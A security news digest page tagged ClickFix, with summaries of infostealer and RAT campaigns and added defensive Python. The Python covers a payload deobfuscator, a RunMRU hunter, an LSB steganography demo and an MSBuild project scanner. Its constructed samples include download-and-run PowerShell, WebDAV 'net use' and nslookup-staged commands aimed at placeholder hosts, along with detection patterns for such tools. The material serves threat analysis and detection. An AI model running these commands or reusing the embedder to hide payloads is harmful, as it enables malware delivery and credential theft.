< ciso brief />

All news with #clickfix tag

69 articles · page 2 of 4

ClickFix Campaigns Deliver MacSync macOS Infostealer

🛡️ Sophos researchers identified three ClickFix campaigns that used malicious search ads and trusted-host lures to coax macOS users into pasting and executing terminal commands, resulting in the deployment of the MacSync infostealer. The campaigns—first observed in November and December 2025 and refreshed in February 2026—leveraged fake Google Sites, ChatGPT conversation redirects, and GitHub-style pages. The February variant introduced dynamic AppleScript and in-memory execution to harvest credentials, keychain data, files, and crypto seed phrases while attempting to erase traces.

ClickFix Lures Evolve to Deploy New In‑Memory Infostealers

🔒 Researchers warn that criminals have scaled ClickFix social-engineering lures to deliver sophisticated, fileless infostealers via compromised WordPress sites. Rapid7 observed a campaign active since December 2025 that leveraged fake Cloudflare CAPTCHA prompts across more than 250 WordPress domains in 12 countries to trick victims into running obfuscated commands. The chain deploys an in-memory loader called DoubleDonut that injects payloads into legitimate Windows processes, and analysts also observed novel .NET and C++ stealers alongside a new Vidar variant. Microsoft noted a separate campaign that pivots from the Run dialog to Windows Terminal for execution.

New ClickFix Variant Uses WebDAV and Trojanized Electron App

🔎 Atos researchers disclosed a ClickFix variation that leverages the Run dialog to execute a 'net use' command, map a remote WebDAV share, and run a hosted batch file. The chain downloads a ZIP that unpacks a trojanized WorkFlowy Electron app whose app.asar contains an obfuscated main.js acting as a persistent C2 beacon and dropper. The campaign evaded Microsoft Defender for Endpoint and was detected through targeted hunting of RunMRU registry activity.

WordPress sites abused to deliver ClickFix infostealers

🔒 Rapid7 has identified a widespread campaign that compromises legitimate WordPress websites to infect visitors with infostealer malware. Attackers display a convincing fake Cloudflare CAPTCHA and use the ClickFix social‑engineering trick to prompt victims to paste commands into Windows Run, initiating staged downloads. Observed payloads include Vidar, Impure, Vodka and Double Donut. Site administrators are urged to update components, enable MFA, use strong passwords and avoid executing untrusted code on credential-bearing devices.

Termite Ransomware Breaches Tied to ClickFix, CastleRAT

🔒 Researchers at MalBeacon observed the threat actor Velvet Tempest using a ClickFix malvertising chain to trick victims into pasting obfuscated commands into the Windows Run dialog. Operators leveraged nested cmd.exe chains and legitimate utilities (including finger.exe and csc.exe) to stage loaders, compile .NET components, and deploy Python-based persistence under C:\ProgramData. The intrusion staged DonutLoader and retrieved the CastleRAT backdoor, though Termite ransomware was not deployed during the observed intrusion.

ClickFix phishers use Win+X shortcut to evade defenses

⚠ Attackers have shifted ClickFix phishing to use the Windows + X → I shortcut to open Windows Terminal, prompting victims to paste malicious PowerShell via fake CAPTCHAs and verification prompts. This avoids detections focused on Run (Win+R) and undermines basic security training. Microsoft says the campaign launches layered, persistent chains that decode embedded hex, download a renamed 7-Zip binary to extract payloads, establish persistence, apply Defender exclusions, and exfiltrate data.

Microsoft: ClickFix Uses Windows Terminal to Deploy Malware

⚠️ Microsoft disclosed a ClickFix social engineering campaign observed in February 2026 that leverages the Windows Terminal app to execute malicious commands and deliver the Lumma Stealer. Attackers instruct targets to open Windows Terminal (wt.exe) via Windows+X → I and paste hex‑encoded, XOR‑compressed commands from fake CAPTCHA or troubleshooting pages, avoiding Run‑dialog detection. The decoded chain downloads a ZIP and a renamed 7‑Zip binary to extract payloads, sets persistence, configures Defender exclusions, and injects the stealer into browser processes to harvest stored credentials.
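The two Windows Terminal items above describe the same chain: a hex-encoded, XOR-obscured and compressed command that the victim pastes into wt.exe. The Python below is an added example, not code from Microsoft's write-up or from the campaign, showing how an analyst peels those layers off a captured paste. The sample blob, the stand-in command, the example.invalid URL and the one-byte key 0x5a are constructed here, and the layer order (hex over XOR over zlib) is an assumption about the general shape of such stages, not a statement about the real payload. A one-byte XOR key is recovered by brute force using the compression header as a crib; a longer key, which the pasted command must carry in order to decode itself, is passed in explicitly.

```python
import binascii
import gzip
import re
import zlib

HEX_RE = re.compile(rb"^[0-9a-fA-F]+$")
# gzip and zlib stream headers that a correctly de-XORed stage should start with
COMPRESSION_MAGIC = (b"\x1f\x8b", b"\x78\x01", b"\x78\x5e", b"\x78\x9c", b"\x78\xda")


def xor_bytes(data: bytes, key: bytes) -> bytes:
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def looks_hex(data: bytes) -> bool:
    return len(data) >= 2 and len(data) % 2 == 0 and HEX_RE.match(data) is not None


def mostly_printable(data: bytes, threshold: float = 0.95) -> bool:
    if not data:
        return False
    ok = sum(1 for b in data if 32 <= b < 127 or b in (9, 10, 13))
    return ok / len(data) >= threshold


def try_decompress(data: bytes):
    """gzip and zlib verify their headers; raw deflate does not, so its output is only
    accepted when it reads as text (random bytes occasionally inflate to garbage)."""
    attempts = (("gzip", gzip.decompress), ("zlib", zlib.decompress),
                ("deflate", lambda d: zlib.decompress(d, -15)))
    for name, fn in attempts:
        try:
            out = fn(data)
        except (OSError, EOFError, zlib.error):
            continue
        if name != "deflate" or mostly_printable(out):
            return out
    return None


def recover_single_byte_key(data: bytes):
    """Brute-force a one-byte XOR key: first look for a compression header, then for text."""
    head = data[:64]
    for k in range(256):
        if xor_bytes(head[:2], bytes([k])) in COMPRESSION_MAGIC:
            return bytes([k])
    for k in range(256):
        if mostly_printable(xor_bytes(head, bytes([k]))):
            return bytes([k])
    return None


def peel(blob: bytes, key: bytes = b"", max_layers: int = 8):
    """Strip hex / XOR / compression layers until printable text remains.
    Returns (text, [layer names]). Pass the XOR key taken from the pasted command when it
    is longer than one byte; with no key, a one-byte key is brute-forced."""
    data = blob.strip()
    layers = []
    for _ in range(max_layers):
        if looks_hex(data):
            data = binascii.unhexlify(data)
            layers.append("hex")
            continue
        inflated = try_decompress(data)
        if inflated is not None:
            data = inflated
            layers.append("decompress")
            continue
        if mostly_printable(data):
            break
        k = key if key else recover_single_byte_key(data)
        if k is None:
            break
        data = xor_bytes(data, k)
        layers.append("xor(%s)" % k.hex())
        key = b""  # a supplied key is applied once; any further layer is brute-forced
    return data.decode("utf-8", "replace"), layers


# Constructed sample: a harmless stand-in command, zlib-compressed, XORed with one byte and
# hex-encoded. It mimics the layering described above; it is not the campaign's payload.
SAMPLE_COMMAND = ('powershell -nop -w hidden -c "IEX (New-Object Net.WebClient)'
                  '.DownloadString(\'https://example.invalid/stage2.ps1\')"')
SAMPLE_KEY = b"\x5a"


def build_sample(command: str = SAMPLE_COMMAND, key: bytes = SAMPLE_KEY) -> bytes:
    return binascii.hexlify(xor_bytes(zlib.compress(command.encode()), key))


def demo():
    """Decode the constructed blob without being told the key."""
    return peel(build_sample())


if __name__ == "__main__":
    text, layers = demo()
    print("layers:", " -> ".join(layers))
    print(text)
```

The decoder stops as soon as the data reads as text, so the recovered command can be fed to the usual PowerShell triage (the URL it fetches, the renamed 7-Zip download, the Add-MpPreference exclusions) without ever executing it.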

QuickLens Chrome Extension Compromised to Steal Crypto

⚠️ The QuickLens Chrome extension was removed from the Chrome Web Store after a malicious update (v5.8) was pushed that added info‑stealing and ClickFix attack functionality. Security researchers found the extension stripped security headers, added powerful permissions, and contacted a command‑and‑control server to fetch and run payloads on every page. A fake Google Update prompt led to malware that targeted Windows and attempted to steal browser credentials and cryptocurrency seed phrases. Google has disabled the extension; affected users should remove it, scan devices, reset passwords, and move funds from compromised wallets.

Variations of ClickFix technique and evolving delivery

🔒 The Kaspersky Team outlines evolving variations of the ClickFix social‑engineering technique, where attackers trick users into executing malicious commands on their own machines. Recent campaigns abuse legitimate utilities such as mshta.exe, nslookup and the legacy Finger protocol, and have used platforms like TikTok, Pastebin and fake extension pages to prompt victims to run code. Observed payloads include infostealers and remote access trojans such as ModeloRAT. Organizations are advised to prioritize user awareness and robust endpoint and XDR controls to mitigate these risks.

ClickFix Attack Uses nslookup DNS to Deliver PowerShell

⚠️ Microsoft has identified a novel ClickFix social-engineering variant that instructs victims to run an nslookup against an attacker-controlled resolver to retrieve a malicious PowerShell script embedded in the DNS NAME field. The response is parsed and executed via cmd.exe, then pulls a second-stage ZIP containing a Python runtime and scripts that lead to the ModeloRAT remote-access trojan. Organizations should monitor unusual DNS queries to untrusted nameservers and apply endpoint controls to block unauthorized script execution and persistence.

Pastebin-Promoted ClickFix JavaScript Attack Hijacks Swaps

🚨 Threat actors are abusing Pastebin comments to promote a ClickFix-style social engineering campaign that tricks cryptocurrency users into executing JavaScript in their browser, enabling attackers to hijack Bitcoin swap transactions on Swapzone.io. Victims are directed to copy a javascript: snippet from a hosted paste and execute it in the address bar; the injected, obfuscated payload overrides the exchange's swap logic and replaces deposit addresses with attacker-controlled wallets. The code also tampers with displayed rates and offers to simulate successful arbitrage. Because the script runs within the victim's authenticated session, the interface looks legitimate while funds are irreversibly redirected to attackers.

Microsoft Details DNS-Based ClickFix Variant Targeting Users

🔍 Microsoft disclosed a DNS-based evolution of the ClickFix social-engineering tactic that coerces victims into running nslookup via the Windows Run dialog to retrieve a second-stage payload. The initial cmd.exe command queries a hard-coded external DNS server and extracts the Name: response to execute the next stage. The staged payload downloads a ZIP from azwsappdev[.]com, runs a malicious Python script, drops a VBScript that launches ModeloRAT, and establishes persistence via a Startup LNK.
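The Atos WebDAV item and the two nslookup items on this page share one artifact: the command was typed into the Run dialog, which Windows records as a string value under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, with the MRUList value giving the order. As an added example, not the researchers' own tooling, the Python below parses an exported RunMRU value set in most-recent-first order and flags the Run-dialog patterns described on this page: net use against a WebDAV share, a for /f loop wrapping nslookup against a non-corporate resolver, PowerShell download or hidden-window switches, mshta, finger, the App-V publishing script and MSBuild. The registry values, the 203.0.113.x addresses (RFC 5737 documentation range), the hostname and the trusted-resolver list are constructed; the rule names are mine.

```python
import re

# Detection rules for the Run-dialog ClickFix variants described on this page.
# Rule names are my own; each regex runs against one RunMRU command string.
RULES = [
    ("webdav_net_use",            # net use against \\host@80 or \\host@SSL\DavWWWRoot
     re.compile(r"\bnet\s+use\b.*\\\\[^\s\\]+@(?:ssl|\d+)\\", re.I)),
    ("dns_staged_script",         # for /f wrapping nslookup to pull the next stage from DNS
     re.compile(r"(?=.*\bnslookup\b)(?=.*\bfor\s+/f\b)", re.I)),
    ("powershell_download_or_encoded",
     re.compile(r"\bpowershell\b.*(?:-e(?:nc(?:odedcommand)?)?\s|\biex\b|downloadstring"
                r"|invoke-expression|-w(?:indowstyle)?\s+hidden)", re.I)),
    ("mshta_remote", re.compile(r"\bmshta\b.*https?:", re.I)),
    ("finger_protocol", re.compile(r"\bfinger(?:\.exe)?\s", re.I)),
    ("appv_script_proxy", re.compile(r"SyncAppvPublishingServer\.vbs", re.I)),
    ("msbuild_project", re.compile(r"\bmsbuild(?:\.exe)?\b.*\.(?:proj|csproj|xml)\b", re.I)),
    ("csharp_compiler", re.compile(r"\bcsc(?:\.exe)?\b", re.I)),
]

# Arguments following nslookup up to the next pipe, escape or redirection character.
NSLOOKUP_ARGS = re.compile(r"\bnslookup\b([^|&^<>)]*)", re.I)


def parse_runmru(values: dict) -> list:
    """Return (value name, command) pairs most-recent-first.
    RunMRU keeps one command per single-letter value, each terminated by a literal
    backslash-1, and MRUList lists the letters most-recent-first."""
    entries = []
    for letter in values.get("MRUList", ""):
        raw = values.get(letter)
        if raw is None:
            continue
        entries.append((letter, raw[:-2] if raw.endswith("\\1") else raw))
    return entries


def nslookup_resolver(cmd: str):
    """nslookup's optional second positional argument is the server it queries."""
    m = NSLOOKUP_ARGS.search(cmd)
    if not m:
        return None
    positional = [a for a in m.group(1).split() if not a.startswith("-")]
    return positional[1] if len(positional) > 1 else None


def hunt(values: dict, trusted_resolvers) -> list:
    """Apply every rule to every RunMRU entry and report the ones that match."""
    findings = []
    for letter, cmd in parse_runmru(values):
        hits = [name for name, rx in RULES if rx.search(cmd)]
        resolver = nslookup_resolver(cmd)
        if resolver and resolver not in trusted_resolvers:
            hits.append("untrusted_resolver:" + resolver)
        if hits:
            findings.append({"value": letter, "command": cmd, "rules": hits})
    return findings


# Constructed RunMRU export (not from a real incident). "b" mimics the WebDAV net use
# chain, "c" the nslookup for-loop chain; "a" and "d" are benign entries.
SAMPLE_RUNMRU = {
    "MRUList": "dcba",
    "a": "notepad\\1",
    "b": "cmd /c net use Z: \\\\203.0.113.5@80\\DavWWWRoot & Z:\\update.bat\\1",
    "c": ("cmd /c for /f \"tokens=2\" %a in "
          "('nslookup -type=a update.example.invalid 203.0.113.7 ^| findstr Name') "
          "do powershell -nop -w hidden -c \"%a\"\\1"),
    "d": "calc\\1",
}
TRUSTED_RESOLVERS = {"10.0.0.53", "10.0.1.53"}  # assumed corporate resolvers


if __name__ == "__main__":
    for f in hunt(SAMPLE_RUNMRU, TRUSTED_RESOLVERS):
        print(f["value"], f["rules"], f["command"])
```

On a live host the value set can be exported with `Get-ItemProperty 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'` in PowerShell and fed to hunt() as a dict. RunMRU is a per-user key, so collect it for every profile on the machine; it only records what went through the Run dialog, which is exactly why the Win+X → I Windows Terminal variant elsewhere on this page needs a separate process-creation source.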

LummaStealer Spike Linked to CastleLoader and ClickFix

🛡️ Bitdefender has identified a sharp increase in LummaStealer infections driven by social‑engineering campaigns that use the ClickFix clipboard trick to deliver the CastleLoader malware. CastleLoader is a heavily obfuscated, script‑based loader that decrypts and executes payloads in memory while adapting persistence and file paths to evade detection. Researchers note a characteristic failed DNS lookup artifact that can aid detection and recommend avoiding pirated or untrusted software and never running PowerShell commands provided by web pages.

North Korean Hackers Use Deepfake Meetings to Target Crypto

🛡️ Mandiant attributes a targeted campaign to North Korean financially motivated group UNC1069, which combines social engineering, deepfake video and macOS malware to steal cryptocurrency and credentials. The attackers hijacked a cryptocurrency executive’s Telegram account to build trust, then sent a calendar invite to a faux Zoom meeting hosted on attacker infrastructure. During the call a purported deepfake of the executive appeared and a ClickFix ruse persuaded victims to run commands, enabling deployment of backdoors and information-stealers.

North Korean actors use ClickFix and macOS backdoors

🔐 UNC1069-linked actors used a ClickFix-style social engineering chain to compromise a macOS user at a cryptocurrency/DeFi company. Attackers hijacked a Telegram account, staged a fake Zoom meeting (reportedly using AI-generated video), and instructed the victim to paste curl | zsh commands into Terminal. The resulting infection deployed a multi-stage macOS toolkit—WAVESHAPER, HYPERCALL, HIDDENCALL, DEEPBREATH, and CHROMEPUSH—enabling remote access and data theft. Mandiant provided IOCs and YARA rules to aid detection.

Microsoft: Python-based infostealers targeting macOS

⚠ Microsoft warns that information-stealing campaigns are expanding beyond Windows to target Apple macOS by leveraging cross-platform languages like Python and abusing trusted distribution platforms. Since late 2025, attackers have used malvertising and Google Ads to redirect users to fake sites that employ ClickFix lures and DMG installers to deploy families such as Atomic macOS Stealer (AMOS), MacSync, and DigitStealer. Campaigns use fileless execution, native macOS utilities, and AppleScript to harvest browser credentials, session cookies, iCloud Keychain items, and developer secrets. Organizations are urged to train users on malvertising and fake installers, monitor Terminal and iCloud Keychain access, and inspect network egress for POSTs to newly registered or suspicious domains.

ClickFix attacks abuse Windows App-V to deliver Amatera

🔒 A recent campaign blends the ClickFix social-engineering method with a fake CAPTCHA and a signed Microsoft App-V script to deliver the Amatera infostealer. Attackers use the trusted SyncAppvPublishingServer.vbs executed via wscript.exe to proxy PowerShell and evade detection, then fetch configuration from a public Google Calendar. Later stages hide encrypted PowerShell payloads in PNGs via LSB steganography and execute Amatera in memory. Researchers recommend removing unused App-V components, restricting the Run dialog, enabling PowerShell logging, and monitoring outbound connection anomalies.
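The App-V item above ends with encrypted PowerShell hidden in PNG files via LSB steganography. The Python below is an added illustration of that mechanism, not the campaign's code and not the researchers' extractor: each payload bit overwrites the least significant bit of one colour-channel byte, so no channel value moves by more than one and the image looks unchanged, while an extractor that knows the layout reads the bits straight back. It assumes the simplest layout (a 32-bit big-endian length prefix, bits MSB-first, one bit per channel byte, in buffer order) over an already-decoded RGB buffer; real samples vary in bit order, channel choice and framing, and the PNG decode step (for example with Pillow) is left out so the block runs on the standard library alone. The carrier bytes and the stand-in payload are constructed, and the payload is embedded in clear here whereas the real campaign stores it encrypted.

```python
import random


def _bits(data: bytes):
    """Yield payload bits MSB-first, the bit order assumed for this layout."""
    for byte in data:
        for shift in range(7, -1, -1):
            yield (byte >> shift) & 1


def lsb_embed(pixels: bytes, payload: bytes) -> bytes:
    """Write a length-prefixed payload into the LSB of successive channel bytes."""
    framed = len(payload).to_bytes(4, "big") + payload
    if len(framed) * 8 > len(pixels):
        raise ValueError("carrier too small: need %d channel bytes" % (len(framed) * 8))
    out = bytearray(pixels)
    for i, bit in enumerate(_bits(framed)):
        out[i] = (out[i] & 0xFE) | bit  # clear the low bit, then set it to the payload bit
    return bytes(out)


def _read_bits(pixels: bytes, start: int, count: int) -> int:
    value = 0
    for i in range(start, start + count):
        value = (value << 1) | (pixels[i] & 1)
    return value


def lsb_extract(pixels: bytes) -> bytes:
    """Read the length prefix, then that many bytes, from the LSB plane."""
    length = _read_bits(pixels, 0, 32)
    if 32 + length * 8 > len(pixels):
        raise ValueError("length %d does not fit the carrier: wrong layout or no payload" % length)
    return bytes(_read_bits(pixels, 32 + 8 * i, 8) for i in range(length))


def max_channel_delta(a: bytes, b: bytes) -> int:
    """Largest change to any single channel value; LSB embedding never exceeds 1."""
    return max(abs(x - y) for x, y in zip(a, b))


def sample_carrier(width: int = 64, height: int = 64, seed: int = 1) -> bytes:
    """Constructed RGB buffer standing in for a decoded PNG (3 bytes per pixel)."""
    rng = random.Random(seed)
    return bytes(rng.randrange(256) for _ in range(width * height * 3))


# Constructed stand-in payload; the real stage would be an encrypted PowerShell blob.
SAMPLE_PAYLOAD = b'IEX (New-Object Net.WebClient).DownloadString("https://example.invalid/next.ps1")'


def demo():
    """Embed the sample payload, recover it, and measure the visual impact."""
    carrier = sample_carrier()
    stego = lsb_embed(carrier, SAMPLE_PAYLOAD)
    return lsb_extract(stego), max_channel_delta(carrier, stego)


if __name__ == "__main__":
    recovered, delta = demo()
    print("recovered:", recovered.decode())
    print("max channel change:", delta)
```

When a sample's extraction routine is visible in the preceding PowerShell stage, mirror its exact bit order and framing in lsb_extract rather than guessing; an LSB plane that decodes to a plausible length followed by high-entropy bytes is the usual sign that the image is a container and that the next layer is the decryption step.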

Holiday Season Malware Targets Hotels via Booking Lures

⚠️ Securonix researchers have identified a multi-stage malware campaign, tracked as PHALT#BLYX, that targets hospitality organizations during the holiday season. The attack begins with phishing emails impersonating Booking.com, using urgent, high‑value reservation charges to lure victims to a convincing clone site. Victims are coerced through fake CAPTCHA and simulated BSOD prompts to paste a PowerShell command that downloads a project file executed by MSBuild.exe, culminating in a heavily obfuscated DCRat remote access Trojan. Securonix advises staff training, strict handling of browser‑prompted commands and enhanced monitoring of trusted binaries and process behaviour.

Phishing Campaign Uses Fake Booking Emails to Deploy DCRat

📧 Securonix researchers uncovered PHALT#BLYX, a phishing campaign that uses ClickFix-style lures and counterfeit Booking.com reservation messages to trick hospitality staff into executing commands that pull and run remote code. The landing pages present a fake CAPTCHA then a staged blue screen of death that instructs victims to paste a command into the Windows Run dialog, triggering a PowerShell dropper. That dropper downloads an MSBuild project (v.proj) and invokes MSBuild.exe to configure Defender exclusions, persist in Startup, and retrieve the DCRat remote-access trojan.

ClickFix Campaign Uses Fake BSOD to Trick Hospitality Staff

🛑 This campaign impersonates Booking.com to redirect hospitality staff to a cloned site that triggers a full-screen fake Windows BSOD. The page instructs victims to paste and run a command that launches PowerShell, compiles a malicious .NET project via MSBuild.exe, and executes a loader. The payload adds Defender exclusions, triggers UAC prompts for elevation, and deploys DCRat (staxs.exe), which provides remote access and can drop additional tools such as cryptocurrency miners.
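All three PHALT#BLYX items above end the same way: MSBuild.exe, a signed Microsoft binary, is handed an attacker-supplied project file and compiles and runs the code inside it. As an added example, not Securonix's code and not the real v.proj, the Python below scans an MSBuild project for the construct that makes this possible: a UsingTask bound to CodeTaskFactory or RoslynCodeTaskFactory with an inline <Code> body, plus any Exec task, and lists loader-like strings found in the body. The sample project, its C# fragment, the token list and the example.invalid URL are constructed; the fragment is never compiled or executed by this script.

```python
import xml.etree.ElementTree as ET

# Strings a loader body tends to contain; this list is my own, not a vendor signature.
LOADER_TOKENS = ("Add-MpPreference", "ExclusionPath", "Startup", "WebClient",
                 "DownloadString", "DownloadFile", "FromBase64String",
                 "ProcessStartInfo", "Process.Start", "powershell")

# Task factories that compile source embedded in the project file at build time.
INLINE_FACTORIES = ("CodeTaskFactory", "RoslynCodeTaskFactory")


def _local(tag: str) -> str:
    """Strip the XML namespace so xmlns-2003 and SDK-style projects scan alike."""
    return tag.rsplit("}", 1)[-1]


def scan_msbuild_project(xml_text: str) -> list:
    """Walk every element and record the constructs that let a .proj run arbitrary code."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        name = _local(el.tag)
        if name == "UsingTask" and el.get("TaskFactory", "") in INLINE_FACTORIES:
            findings.append({"kind": "inline_code_task",
                             "task": el.get("TaskName"),
                             "factory": el.get("TaskFactory"),
                             "assembly": el.get("AssemblyFile")})
        elif name == "Code":
            body = (el.text or "").lower()
            findings.append({"kind": "inline_code_body",
                             "language": el.get("Language"),
                             "type": el.get("Type"),
                             "tokens": [t for t in LOADER_TOKENS if t.lower() in body]})
        elif name == "Exec":
            findings.append({"kind": "exec_command", "command": el.get("Command", "")})
    return findings


def verdict(findings: list) -> str:
    """Inline code plus loader strings is 'suspicious'; any code or Exec path is 'review'."""
    kinds = {f["kind"] for f in findings}
    has_code = "inline_code_task" in kinds or "inline_code_body" in kinds
    has_tokens = any(f.get("tokens") for f in findings)
    if has_code and has_tokens:
        return "suspicious"
    if has_code or "exec_command" in kinds:
        return "review"
    return "clean"


# Constructed project in the shape the campaign is described to use: one target that
# invokes an inline-compiled task. The C# is a harmless stand-in and is never built here.
SAMPLE_PROJECT = r"""<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="Build">
    <Stage />
  </Target>
  <UsingTask TaskName="Stage" TaskFactory="CodeTaskFactory"
             AssemblyFile="$(MSBuildToolsPath)\Microsoft.Build.Tasks.v4.0.dll">
    <Task>
      <Code Type="Fragment" Language="cs"><![CDATA[
        // constructed stand-in for a loader body; nothing here is executed by this script
        var psi = new System.Diagnostics.ProcessStartInfo("powershell",
            "-nop -w hidden -c \"Add-MpPreference -ExclusionPath $env:APPDATA\"");
        var url = "https://example.invalid/stage.bin";
        var lnk = System.IO.Path.Combine(
            System.Environment.GetFolderPath(System.Environment.SpecialFolder.Startup), "upd.lnk");
      ]]></Code>
    </Task>
  </UsingTask>
</Project>
"""


if __name__ == "__main__":
    results = scan_msbuild_project(SAMPLE_PROJECT)
    for f in results:
        print(f)
    print("verdict:", verdict(results))
```

The scanner is meant for triage of a project file recovered from disk or from the PowerShell dropper's download; the process-side signal that complements it is MSBuild.exe starting from a path outside a build tree with a .proj argument in a user-writable directory, followed by the Add-MpPreference and Startup-folder writes the items above describe.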